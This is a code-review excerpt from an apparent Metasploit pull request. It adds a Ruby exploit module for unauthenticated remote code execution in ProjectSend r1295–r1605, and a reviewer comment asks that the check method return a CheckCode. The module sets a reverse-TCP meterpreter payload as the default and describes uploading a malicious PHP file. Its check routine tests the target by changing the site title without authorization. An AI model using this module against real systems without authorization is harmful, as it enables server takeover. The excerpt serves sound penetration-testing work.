modules/exploits/linux/http/projectsend_unauth_rce.rb

```diff
@@ -0,0 +1,420 @@
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'ProjectSend r1295 - r1605 Unauthenticated Remote Code Execution',
+        'Description' => %q{
+          This module exploits an improper authorization vulnerability in ProjectSend versions r1295 through r1605.
+          The vulnerability allows an unauthenticated attacker to obtain remote code execution by enabling user registration,
+          disabling the whitelist of allowed file extensions, and uploading a malicious PHP file to the server.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Florent Sicchio', # Discovery
+          'Hugo Clout', # Discovery
+          'ostrichgolf' # Metasploit module
+        ],
+        'References' => [
+          ['URL', 'https://github.com/projectsend/projectsend/commit/193367d937b1a59ed5b68dd4e60bd53317473744'],
+          ['URL', 'https://www.synacktiv.com/sites/default/files/2024-07/synacktiv-projectsend-multiple-vulnerabilities.pdf'],
+        ],
+        'DisclosureDate' => '2024-07-19',
+        'DefaultTarget' => 0,
+        'Targets' => [
+          [
+            'PHP Command',
+            {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP,
+              'Type' => :php_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'php/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new(
+          'TARGETURI',
+          [true, 'The TARGETURI for ProjectSend', '/']
+        )
+      ]
+    )
+  end
+
+  def check
+    # Obtain the current title of the website
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(datastore['TARGETURI'], 'index.php')
+    })
+    return CheckCode::Unknown('Target is not reachable') unless res
+
+    # The title will always contain "»" ("&raquo;") regardless of localization. For example: "Log in » ProjectSend"
+    title_regex = %r{<title>.*?&raquo;\s+(.*?)</title>}
+    original_title = res.body[title_regex, 1]
+    csrf_token = get_csrf_token
+
+    # Generate a new title for the website
+    random_new_title = Rex::Text.rand_text_alphanumeric(8)
+
+    # Test if the instance is vulnerable by trying to change its title
+    params = {
+      'csrf_token' => csrf_token,
+      'section' => 'general',
+      'this_install_title' => random_new_title
+    }
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI'], 'options.php'),
+      'keep_cookie' => true,
+      'vars_post' => params
+    })
+
+    unless res
+      fail_with(Failure::NoAccess, 'Failed to connect to the provided URL')
+    end
```

Comment:
As mentioned [earlier](https://github.com/rapid7/metasploit-framework/pull/19531/files#r1795511088) - the check method must always return a `CheckCode`, instead of calling `fail_with` here we should `return CheckCode::Unknown`
```suggestion
    return CheckCode::Unknown('Failed to connect to the provided URL') unless res
```